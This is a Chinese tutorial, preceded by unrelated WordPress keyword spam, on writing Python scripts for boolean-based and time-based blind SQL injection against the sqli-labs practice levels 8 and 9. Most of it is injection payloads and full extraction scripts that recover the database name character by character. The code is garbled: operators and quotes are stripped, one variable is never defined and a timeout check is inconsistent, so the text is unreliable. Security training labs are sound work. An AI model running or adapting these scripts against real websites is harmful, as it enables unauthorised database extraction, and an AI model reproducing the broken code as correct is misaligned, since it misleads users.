怎么建设网站zy258,wordpress滑动插件,WordPress谷歌字体会慢,wordpress干嘛用的文章目录 布尔盲注脚本延时注入脚本 安装xampp#xff0c;在conf目录下修改它的http配置文件#xff0c;如下#xff0c;找到配置文件#xff1a; 修改配置文件中的默认主页#xff0c;让xampp能访问phpstudy的www目录#xff0c;因为xampp的响应速度比phpstudy快得多在conf目录下修改它的http配置文件如下找到配置文件 修改配置文件中的默认主页让xampp能访问phpstudy的www目录因为xampp的响应速度比phpstudy快得多所以用它做SQL注入脚本的服务器 布尔盲注脚本
以sqli-labs第8关为例在第8关进行测试发现该关是字符型注入 构建一个payload用来布尔盲注判断数据库名称的长度
?id2 and length(database())1 --URL为
urlhttp://10.9.75.164/sqli-labs/Less-8/index.php构建一个循环注入的while循环不知道循环次数时用while
while True:i 1payload f?id2 and length(database()){i} -- 构建完整的url并发送请求包
full_urlurl payload
print(full_url)
res requests.get(url full_url)可以发现在正确注入时页面会回显You are in…以此为中止的标志输出长度
if You are in.........in res.text:print(f[*] The length is (i})break完整脚本
import requestsurlhttp://10.9.75.164/sqli-labs/Less-8/index.phpi0
while True:i 1payload f?id2 and length(database()){i} -- full_urlurl payloadprint(full_url)res requests.get(url full_url)if You are in.........in res.text:print(f[*] The length:(i})break输出结果如下获得了数据库的长度为8
然后用布尔盲注获取数据库名称每个字符逐个获取 ord方法将字符转ASCII码 string.printable.strip()生成可打印字符串 import string
c_set string.printable.strip()
for i in range(con_len):for c in c_set:payload f?id2 and ascii(substr(database(),{i 1},1)){ord(c)} -- full_url url payloadprint(full_url)res requests.get(url full_url)if you are in......... in res.text:con cprint(f[*] The content: {con})完整脚本如下
import string
import requestsurlhttp://10.9.75.164/sqli-labs/Less-8/index.phpi0
while True:i 1payload f?id2 and length(database()){i} -- full_urlurl payloadprint(full_url)res requests.get(url full_url)if You are in.........in res.text:print(f[*] The length:(i})break
c_set string.printable.strip()
for i in range(con_len):for c in c_set:payload f?id2 and ascii(substr(database(),{i 1},1)){ord(c)} -- full_url url payloadprint(full_url)res requests.get(url full_url)if you are in......... in res.text:con cprint(f[*] The content: {con})运行结果如下成功遍历出数据库名称 延时注入脚本
以sqli-labs第9关为例经过测试这关无报错注入、布尔盲注和联合查询只能用延时注入页面有延迟 和布尔盲注思路一样先获取数据库名称的长度再获取内容用if和sleep函数构造一个payload 如下
payload?id1 and if(length(database())1, sleep(5),1) -- 延时注入脚本和布尔盲注思路类似不同的是延时注入脚本构建了一个超时函数然后用if语句来判断有延时注入的URL如果请求正常就将请求正文返回并在while循环中和payload拼接构成完整的url并输出如果超时就输出此时payload的长度。
下面是完整脚本
import requests
urlhttp://10.9.75.164/sqli-labs/Less-9/index.phpcon_len0
con
def get_timeout(url):try:res requests.get(url url,timeout 3)except:return timeoutelse:return res.text
while True:con_len 1payload f?id1 and if(length(database()){con_len},sleep(5),1) -- full_url url payloadif timeout in get_timeout(full_url):print(f[*] The length of content: {con_len})break如图脚本执行后在超时时返回长度 然后和布尔盲注遍历出数据库名称一样用for循环做数据库名称遍历将if语句中判断的内容改为timeout即可
import requests
import string
urlhttp://10.9.75.164/sqli-labs/Less-9/index.phpcon_len0
con
def get_timeout(url):try:res requests.get(url url,timeout 3)except:return timeoutelse:return res.text
while True:con_len 1payload f?id1 and if(length(database()){con_len},sleep(5),1) -- full_url url payloadprint(full_url)if timeout in get_timeout(full_url):print(f[*] The length of content: {con_len})break
c_set string.printable.strip()
for i in range(con_len):for c in c_set:payload f?id2 and ascii(substr(database(),{i 1},1)){ord(c)} -- full_url url payloadres requests.get(url full_url)if timeout in res.text:con cprint(f[*] The content: {con})运行结果如下成功获得数据库名称
